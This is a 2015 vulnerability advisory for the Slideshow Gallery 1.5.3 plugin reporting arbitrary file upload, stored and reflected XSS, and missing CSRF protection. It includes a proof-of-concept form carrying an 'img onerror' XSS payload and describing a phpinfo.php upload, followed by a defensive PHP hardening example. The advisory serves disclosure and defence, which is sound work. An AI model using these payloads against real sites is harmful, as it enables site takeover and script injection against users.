Subject: Arbitrary file upload and Cross-Site Scripting (XSS) in Slideshow Gallery 1.5.3
Date: Thu, 20 Aug 2015 11:03:00 +0200

Hello,
1. Arbitrary file upload + persistent Cross-Site Scripting (XSS)
Authenticated administrators can upload arbitrary files (resulting in remote code execution) and store HTML/JS code (there is no CSRF protection).
Method: POST
Example PHP Callstack:
GallerySlide::validate [/slideshow-gallery/models/slide.php:178]
Verification (phpinfo.php upload):
--
<!-- arbitrary file url -->
<!-- other params (form dumped) -->
<input type="hidden" name="Slide[id]" value="1">
<input type="hidden" name="Slide[order]" value="0">
<input value="XXXX <img src=x onerror=alert(1) />" name="Slide[title]">
<textarea name="Slide[description]">11111</textarea>
<input checked="checked" type="radio" name="Slide[showinfo]" value="both">
<input type="radio" name="Slide[showinfo]" value="title">
<input type="radio" name="Slide[showinfo]" value="description">
<input type="radio" name="Slide[showinfo]" value="none">
<input type="text" name="Slide[iopacity]" value="70">
<input checked="checked" type="checkbox" name="Slide[galleries][]" value="1">
<input type="hidden" name="Slide[type]" value="url">
<input type="button" name="Slide_mediaupload" value="Choose File">
<input type="hidden" name="Slide[attachment_id]" value="12">
<input type="file" name="image_file" value="">
<input type="radio" name="Slide[uselink]" value="Y">
<input checked="checked" type="radio" name="Slide[uselink]" value="N">
<input type="text" name="Slide[link]" value="">
<input checked="checked" type="radio" name="Slide[linktarget]" value="self">
<input type="radio" name="Slide[linktarget]" value="blank">
<input type="submit">
</form>
--
The same request also carries the persistent Cross-Site Scripting payload (Slide[title]).
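For the defender side, the following added example (not the plugin's code) shows a hardened save handler for the request above: a CSRF token check, an extension-plus-content allow-list that rejects an upload such as phpinfo.php, and output escaping of Slide[title]. It is plain PHP and assumes a started session and a hidden csrf_token field in the form; the field names image_file and Slide[title] are taken from the advisory.

```php
<?php
// Added illustrative hardening, not the plugin's code. Assumes session_start()
// has run and the form carries a hidden csrf_token field.
const ALLOWED_IMAGE_TYPES = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                             'png' => 'image/png',  'gif' => 'image/gif'];

// CSRF: the submitted token must match the server-side one (constant-time compare).
function csrf_token_valid(array $post, array $session): bool
{
    return isset($post['csrf_token'], $session['csrf_token'])
        && hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Upload: extension allow-list plus MIME type sniffed from the file contents,
// and both must agree. Returns the accepted extension, or null on rejection.
// A "phpinfo.php" upload is refused at the extension check.
function accepted_image_extension(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if (!isset(ALLOWED_IMAGE_TYPES[$ext])) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    return $mime === ALLOWED_IMAGE_TYPES[$ext] ? $ext : null;
}

// XSS: keep the title as plain text in storage and escape it on output, so
// markup in Slide[title] is displayed literally instead of being rendered.
function render_slide_title(string $title): string
{
    return htmlspecialchars($title, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

if (!csrf_token_valid($_POST, $_SESSION ?? [])) {
    http_response_code(403);
    exit('invalid CSRF token');
}
$ext = accepted_image_extension($_FILES['image_file'] ?? []);
if ($ext === null) {
    http_response_code(400);
    exit('only jpg/png/gif images are accepted');
}
// Store under a server-generated name; never reuse the client-supplied filename.
$dest = __DIR__ . '/uploads/' . bin2hex(random_bytes(16)) . '.' . $ext;
move_uploaded_file($_FILES['image_file']['tmp_name'], $dest);
$title = $_POST['Slide']['title'] ?? '';            // persisted as plain text
echo '<h2>' . render_slide_title($title) . '</h2>'; // escaped at output time
```

The same allow-list check must also be applied to attachments the plugin fetches by URL (Slide[type]=url), since that path bypasses the image_file field entirely.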
2. Reflected Cross-Site Scripting (XSS)
Authenticated administrators can inject HTML/JS code (there is no CSRF protection).
Method: GET
Vulnerable parameter: Gallerymessage
Verification:
--
Regards,
Marcin Probola,